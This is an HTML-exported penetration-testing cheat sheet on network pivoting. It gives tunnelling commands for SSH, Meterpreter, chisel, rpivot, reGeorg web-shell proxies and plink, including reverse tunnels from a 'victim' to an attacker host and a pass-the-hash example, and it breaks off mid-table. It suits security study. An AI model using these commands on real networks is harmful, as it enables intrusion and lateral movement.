<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>Network Pivoting Techniques</title><style>
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	text-indent: -1.7em;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark-href {
	font-size: 0.75em;
	opacity: 0.5;
}

.sans { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif; }
.mono { font-family: Nitti, 'Microsoft YaHei', '微软雅黑', monospace; }
.pdf .sans { font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .code { font-family: Source Code Pro, 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif, 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .mono { font-family: PT Mono, Nitti, 'Microsoft YaHei', '微软雅黑', monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.highlight-default {
}
.highlight-gray {
	color: rgb(155,154,151);
}
.highlight-brown {
	color: rgb(100,71,58);
}
.highlight-orange {
	color: rgb(217,115,13);
}
.highlight-yellow {
	color: rgb(223,171,1);
}
.highlight-teal {
	color: rgb(15,123,108);
}
.highlight-blue {
	color: rgb(11,110,153);
}
.highlight-purple {
	color: rgb(105,64,165);
}
.highlight-pink {
	color: rgb(173,26,114);
}
.highlight-red {
	color: rgb(224,62,62);
}
.highlight-gray_background {
	background: rgb(235,236,237);
}
.highlight-brown_background {
	background: rgb(233,229,227);
}
.highlight-orange_background {
	background: rgb(250,235,221);
}
.highlight-yellow_background {
	background: rgb(251,243,219);
}
.highlight-teal_background {
	background: rgb(221,237,234);
}
.highlight-blue_background {
	background: rgb(221,235,241);
}
.highlight-purple_background {
	background: rgb(234,228,242);
}
.highlight-pink_background {
	background: rgb(244,223,235);
}
.highlight-red_background {
	background: rgb(251,228,228);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(55, 53, 47, 0.6);
	fill: rgba(55, 53, 47, 0.6);
}
.block-color-brown {
	color: rgb(100,71,58);
	fill: rgb(100,71,58);
}
.block-color-orange {
	color: rgb(217,115,13);
	fill: rgb(217,115,13);
}
.block-color-yellow {
	color: rgb(223,171,1);
	fill: rgb(223,171,1);
}
.block-color-teal {
	color: rgb(15,123,108);
	fill: rgb(15,123,108);
}
.block-color-blue {
	color: rgb(11,110,153);
	fill: rgb(11,110,153);
}
.block-color-purple {
	color: rgb(105,64,165);
	fill: rgb(105,64,165);
}
.block-color-pink {
	color: rgb(173,26,114);
	fill: rgb(173,26,114);
}
.block-color-red {
	color: rgb(224,62,62);
	fill: rgb(224,62,62);
}
.block-color-gray_background {
	background: rgb(235,236,237);
}
.block-color-brown_background {
	background: rgb(233,229,227);
}
.block-color-orange_background {
	background: rgb(250,235,221);
}
.block-color-yellow_background {
	background: rgb(251,243,219);
}
.block-color-teal_background {
	background: rgb(221,237,234);
}
.block-color-blue_background {
	background: rgb(221,235,241);
}
.block-color-purple_background {
	background: rgb(234,228,242);
}
.block-color-pink_background {
	background: rgb(244,223,235);
}
.block-color-red_background {
	background: rgb(251,228,228);
}

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="75284b86-4fd2-4d8d-acda-4f700f9f4e3d" class="page sans"><header><h1 class="page-title">Network Pivoting Techniques</h1></header><div class="page-body"><h2 id="ef7463d5-9ada-4833-ad68-5544ed26d899" class="">Summary</h2><nav id="c3af272d-d015-47a9-8a24-d0860537662d" class="block-color-gray table_of_contents"><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#ef7463d5-9ada-4833-ad68-5544ed26d899">Summary</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#29f38bd1-eda6-4fa5-ab05-06d51b88bec0">Windows netsh Port Forwarding</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#e85896b4-1573-434f-a3ec-b30c9a1b0cac">SSH</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#bfdc2674-e75c-4133-85ac-a4c7f2d64083">SOCKS Proxy</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#09369d3d-da11-44b7-96a7-a934c818bb78">Local Port Forwarding</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#c047af5b-de98-4501-a2bd-2cf3deaa37ed">Remote Port Forwarding</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#0f602b4a-d272-4571-99c9-cb664382147e">Proxychains</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#2edbe2a4-c5de-4629-8ee2-532a85676e33">Web SOCKS - reGeorg</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#a0d2f9c5-fb7e-476d-9e40-688fde40aaec">Metasploit</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#83ffb99f-5891-4ba7-ae79-e886f056cde3">sshuttle</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#c008171e-2326-4a3b-a5d8-927698d0b461">chisel</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#a87c5d57-9e81-43f2-b3f6-e45a822e849f">Rpivot</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#41057f47-bf7b-4000-ac66-3ac1d36d9a6d">plink</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#df2b50b6-7158-451c-8c78-3ce7291e74c8">ngrok</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#7333b461-c15c-4633-8d23-00a39f3f7a20">Basic Pivoting Types</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#8c984e89-15a8-4b76-aeff-4d088f296b11">Listen - Listen</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#edfd31da-3de1-431e-841a-308ab4915cba">Listen - Connect</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#518370c3-e6d2-4105-bd1f-45ddc077d776">Connect - Connect</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#6d4dc234-7526-4227-b7fa-d9d34f3ffc4a">References</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#b6ab6c46-2620-4927-bb13-07c9d4e22835">Network Pivoting Techniques</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#aeb603c4-4bff-4964-bbf5-63bf88ba60c1">Summary</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#dc893d90-7be6-4ebe-8e17-e4690528058d">Windows netsh Port Forwarding</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#040a7180-2b43-4d2b-bf32-b3ffdb1a1f6e">SSH</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#80d25bac-9e07-4126-aaea-7132f5f56c32">SOCKS Proxy</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#ec04ed9c-c446-4c2b-9ee3-12cf05ebaeb4">Local Port Forwarding</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#a425662a-bb40-4d2f-a02d-7baa52c23764">Remote Port Forwarding</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#adf3ddc6-368b-4592-8c54-9f8f1e89b969">Proxychains</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#a87a2c0f-71d2-48c6-afe1-41d72c4e7a51">Web SOCKS - reGeorg</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#f5f76fb8-8d8d-488f-975d-7d77b1da9491">Metasploit</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#b5e8ee65-d1b7-4ba8-940e-f6e879020888">sshuttle</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#9cf52efe-0510-4f43-b382-80f2bbcd8f51">chisel</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#a4668cb2-f596-401e-8454-34e9b80a4131">Rpivot</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#0652e779-07cf-439e-bead-7917aa3680d5">plink</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#db186e30-6b7a-4af9-8b3b-77751a9b2874">ngrok</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#8836a1c5-e0c6-4736-9867-2bb73e70f292">Basic Pivoting Types</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#467e15f6-7c35-4e96-acf1-108726458e6c">Listen - Listen</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#5d461e87-43d9-416c-89b4-c7c487a7f14c">Listen - Connect</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#3b0bf12a-f99e-42e0-9500-959c0a436755">Connect - Connect</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#b7ab0809-0ae8-4226-81e9-1b8022701a12">References</a></div></nav><h2 id="29f38bd1-eda6-4fa5-ab05-06d51b88bec0" class="">Windows netsh Port Forwarding</h2><pre id="424d94b4-cb93-42fd-9559-09a86a92d54e" class="code"><code>netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destportnetsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110</code></pre><ol id="a2d9a8b3-5a5b-44d6-94cc-f4b8fb09ff9d" class="numbered-list" start="1"><li>listenaddress – is a local IP address waiting for a connection.</li></ol><ol id="832f2e63-cd26-4993-970c-4973e7f45c39" class="numbered-list" start="2"><li>listenport – local listening TCP port (the connection is waited on it).</li></ol><ol id="09b317ed-d122-4689-a344-1fa9575cd58a" class="numbered-list" start="3"><li>connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.</li></ol><ol id="6b159199-816a-436a-b854-b0f292ff2561" class="numbered-list" start="4"><li>connectport – is a TCP port to which the connection from listenport is forwarded to.</li></ol><h2 id="e85896b4-1573-434f-a3ec-b30c9a1b0cac" class="">SSH</h2><h3 id="bfdc2674-e75c-4133-85ac-a4c7f2d64083" class="">SOCKS Proxy</h3><pre id="e4a3fdaf-0521-425f-9787-b03a7b47a644" class="code"><code>ssh -D8080 [user]@[host]ssh -N -f -D 9000 [user]@[host]-f : ssh in background-N : do not execute a remote command</code></pre><p id="bddb3fcf-ebdd-4f68-9fcc-fe3d1148fca5" class="">Cool Tip : Konami SSH Port forwarding</p><pre id="d454f66f-0027-4954-a6d1-006586db138d" class="code"><code>[ENTER] + [~C]-D 1090</code></pre><h3 id="09369d3d-da11-44b7-96a7-a934c818bb78" class="">Local Port Forwarding</h3><pre id="8b1c5cdb-790c-4dbb-a452-c9eeb1af10fd" class="code"><code>ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]</code></pre><h3 id="c047af5b-de98-4501-a2bd-2cf3deaa37ed" class="">Remote Port Forwarding</h3><pre id="366ec719-9d87-46f7-8e2f-bbddfceda04b" class="code"><code>ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]ssh -R 3389:10.1.1.224:3389 root@10.11.0.32</code></pre><h2 id="0f602b4a-d272-4571-99c9-cb664382147e" class="">Proxychains</h2><p id="a0a3876d-ecea-4d22-95c8-5926dd2bd5bb" class=""><strong>Config file</strong>: /etc/proxychains.conf</p><pre id="d0f7b320-a660-4c36-9bae-f01855553d18" class="code"><code>[ProxyList]socks4 localhost 8080</code></pre><p id="e07017b6-8cdd-4414-9270-0d92112fd126" class="">Set the SOCKS4 proxy then <code>proxychains nmap -sT 192.168.5.6</code></p><h2 id="2edbe2a4-c5de-4629-8ee2-532a85676e33" class="">Web SOCKS - reGeorg</h2><p id="d484763a-d84f-4058-82e7-4132aa3482b4" class=""><a href="https://github.com/sensepost/reGeorg">reGeorg</a>, the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.</p><p id="33795f5e-e102-4054-a7a7-79f085ff94ef" class="">Drop one of the following files on the server:</p><ul id="d170db8d-6cd4-45bd-9a72-40ba11a3fa80" class="bulleted-list"><li>tunnel.ashx</li></ul><ul id="e4f6d54c-9605-4a52-b720-abe58ba9ff4e" class="bulleted-list"><li>tunnel.aspx</li></ul><ul id="da1ed150-1904-49ac-95fa-ea3088fde13f" class="bulleted-list"><li>tunnel.js</li></ul><ul id="3a0f0cbf-7583-4f79-bc24-41ebc6d455c0" class="bulleted-list"><li>tunnel.jsp</li></ul><ul id="36cefc6c-e9b8-4257-be17-08722d22d84d" class="bulleted-list"><li>tunnel.nosocket.php</li></ul><ul id="9a9619e3-3104-4ebb-8d12-23d7a003c386" class="bulleted-list"><li>tunnel.php</li></ul><ul id="19abede5-10af-4359-8343-517384fece0f" class="bulleted-list"><li>tunnel.tomcat.5.jsp</li></ul><pre id="f5b746ad-c029-4ae9-b793-fadcb3b330dd" class="code"><code>python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080optional arguments:-h, --help           show this help message and exit-l , --listen-on     The default listening address-p , --listen-port   The default listening port-r , --read-buff     Local read buffer, max data to be sent per POST-u , --url           The url containing the tunnel script-v , --verbose       Verbose output[INFO|DEBUG]</code></pre><h2 id="a0d2f9c5-fb7e-476d-9e40-688fde40aaec" class="">Metasploit</h2><pre id="affcc42a-8aa7-4b30-b388-da22cdde28fb" class="code"><code># Meterpreter list active port forwardsportfwd list# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shellportfwd add –l 3389 –p 3389 –r target-hostportfwd add -l 88 -p 88 -r 127.0.0.1portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shellportfwd delete –l 3389 –p 3389 –r target-host# Meterpreter delete all port forwardsportfwd flushor# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0run autoroute -s 192.168.15.0/24use auxiliary/server/socks4a# Meterpreter list all active routesrun autoroute -proute #Meterpreter view available networks the compromised host can access# Meterpreter add route for 192.168.14.0/24 via Session number.route add 192.168.14.0 255.255.255.0 3# Meterpreter delete route for 192.168.14.0/24 via Session number.route delete 192.168.14.0 255.255.255.0 3# Meterpreter delete all routesroute flush</code></pre><h2 id="83ffb99f-5891-4ba7-ae79-e886f056cde3" class="">sshuttle</h2><p id="0ba313a6-0818-4871-9b43-f3542a4d98de" class="">Transparent proxy server that works as a poor man’s VPN. Forwards over ssh.</p><ul id="8d6625b4-5102-4bbf-a7f7-08b166d126c1" class="bulleted-list"><li>Doesn’t require admin.</li></ul><ul id="8d0518b5-cc70-4b72-aef4-ba52e360f35e" class="bulleted-list"><li>Works with Linux and MacOS.</li></ul><ul id="3c3507bd-48a5-4286-8804-5abfe73f17bd" class="bulleted-list"><li>Supports DNS tunneling.</li></ul><pre id="fd4447fa-a594-4c0d-a094-17841b087aaf" class="code"><code>pacman -Sy sshuttleapt-get install sshuttlesshuttle -vvr user@10.10.10.10 10.1.1.0/24sshuttle -vvr username@pivot_host 10.2.2.0/24</code></pre><h2 id="c008171e-2326-4a3b-a5d8-927698d0b461" class="">chisel</h2><pre id="6e5ecb53-69c9-4e47-8086-0472a3086cbb" class="code"><code>go get -v github.com/jpillora/chisel# forward port 389 and 88 to hacker computeruser@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389user@hacker$ /opt/chisel/chisel server -p 8008 --reverse</code></pre><h2 id="a87c5d57-9e81-43f2-b3f6-e45a822e849f" class="">Rpivot</h2><p id="1ba8cdaa-2429-4abf-8236-a348bb60b492" class="">Server (Attacker box)</p><pre id="f41050fa-7cef-4f1c-bbd3-2d332d456ae2" class="code"><code>python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0</code></pre><p id="665bd951-361e-48c7-b80c-da1262f6ecc2" class="">Client (Compromised box)</p><pre id="5961db72-fd6b-4d78-b391-b4483c367e8a" class="code"><code>python client.py --server-ip &lt;ip&gt; --server-port 9443</code></pre><p id="84df7321-6575-41ce-a168-5faf65fe84dd" class="">Through corporate proxy</p><pre id="002ca7cc-96d1-4a2c-887c-2a8d4d7cf60b" class="code"><code>python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e</code></pre><p id="9186ef1b-6567-4f50-beff-7358b7604ce5" class="">Passing the hash</p><pre id="88532805-4ed5-40f9-a033-d2af57119a61" class="code"><code>python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \--ntlm-proxy-port 8080 --domain CORP --username jdoe \--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE</code></pre><h2 id="41057f47-bf7b-4000-ac66-3ac1d36d9a6d" class="">plink</h2><pre id="a8c0c02c-9793-457a-8d3e-47bbb48f3459" class="code"><code># exposes the SMB port of the machine in the port 445 of the SSH Serverplink -l root -pw toor -R 445:127.0.0.1:445# exposes the RDP port of the machine in the port 3390 of the SSH Serverplink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389plink -l root -pw mypassword 192.168.18.84 -Rplink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]# redirects the Windows port 445 to Kali on port 22plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185</code></pre><h2 id="df2b50b6-7158-451c-8c78-3ce7291e74c8" class="">ngrok</h2><pre id="8f4bc7d7-2847-43d8-ad32-01c27a8c2a52" class="code"><code># get the binarywget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zipunzip ngrok-stable-linux-amd64.zip# log into the service./ngrok authtoken 3U[REDACTED_TOKEN]Hm# deploy a port forwarding for 4433./ngrok http 4433./ngrok tcp 4433</code></pre><h2 id="7333b461-c15c-4633-8d23-00a39f3f7a20" class="">Basic Pivoting Types</h2><div id="052ae1e9-ff84-4bbf-a0f9-9bde6bfb2be2" class="collection-content"><h4 class="collection-title"></h4><table class="collection-content"><thead><tr><th>Type</th><th>Use Case</th></tr></thead><tbody><tr id="92da538e-d4c3-4202-b187-decc4ad7221f"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database/Listen%20Listen.html">Listen - Listen</a></td><td class="cell-jKmj">Exposed asset, may not want to connect out.</td></tr><tr id="9a32ade7-f968-4d51-bcf4-bce87bbf81ff"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database/Listen%20Connect.html">Listen - Connect</a></td><td class="cell-jKmj">Normal redirect.</td></tr><tr id="15b13d7a-f711-480f-bb45-1097409eabce"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database/Connect%20Connect.html">Connect - Connect</a></td><td class="cell-jKmj">Can’t bind, so connect to bridge two hosts</td></tr></tbody></table></div><h3 id="8c984e89-15a8-4b76-aeff-4d088f296b11" class="">Listen - Listen</h3><div id="f72c3820-49b1-449d-9f46-36a2ab59a9b4" class="collection-content"><h4 class="collection-title"></h4><table class="collection-content"><thead><tr><th>Type</th><th>Use Case</th></tr></thead><tbody><tr id="2d0fa953-335d-49ad-b769-a0b706b1087f"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%201/ncat.html">ncat</a></td><td class="cell-HYN|">ncat -v -l -p 8080 -c &quot;ncat -v -l -p 9090&quot;</td></tr><tr id="59bfb955-8fbe-4910-b5ff-53d4565ffbc7"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%201/socat.html">socat</a></td><td class="cell-HYN|">socat -v tcp-listen:8080 tcp-listen:9090</td></tr><tr id="0bee06ac-9af2-4ec0-b98b-a123fc241409"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%201/remote%20host%201.html">remote host 1</a></td><td class="cell-HYN|">ncat localhost 8080 &lt; file</td></tr><tr id="a752893c-4189-4b05-8d9e-4ff92ea1b7b7"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%201/remote%20host%202.html">remote host 2</a></td><td class="cell-HYN|">ncat localhost 9090 &gt; newfile</td></tr></tbody></table></div><h3 id="edfd31da-3de1-431e-841a-308ab4915cba" class="">Listen - Connect</h3><div id="75683b7c-1c14-455b-bfba-beb23752d59b" class="collection-content"><h4 class="collection-title"></h4><table class="collection-content"><thead><tr><th>Type</th><th>Use Case</th></tr></thead><tbody><tr id="cbff03f4-082c-499b-8372-5f64d7df2dc9"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%202/ncat.html">ncat</a></td><td class="cell-!b-&gt;">ncat -l -v -p 8080 -c &quot;ncat localhost 9090&quot;</td></tr><tr id="d2f98f00-39d1-47cc-9bf0-809c3444f0f5"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%202/socat.html">socat</a></td><td class="cell-!b-&gt;">socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090</td></tr><tr id="d68f06ec-730a-4383-b79b-bad17cf718df"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%202/remote%20host%201.html">remote host 1</a></td><td class="cell-!b-&gt;">ncat localhost -p 8080 &lt; file</td></tr><tr id="8bc745b3-bebf-46eb-8392-b6ab38edb583"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%202/remote%20host%202.html">remote host 2</a></td><td class="cell-!b-&gt;">ncat -l -p 9090 &gt; newfile</td></tr></tbody></table></div><h3 id="518370c3-e6d2-4105-bd1f-45ddc077d776" class="">Connect - Connect</h3><div id="dc54a684-8c70-494b-bb80-2e7bf89fd2b4" class="collection-content"><h4 class="collection-title"></h4><table class="collection-content"><thead><tr><th>Type</th><th>Use Case</th></tr></thead><tbody><tr 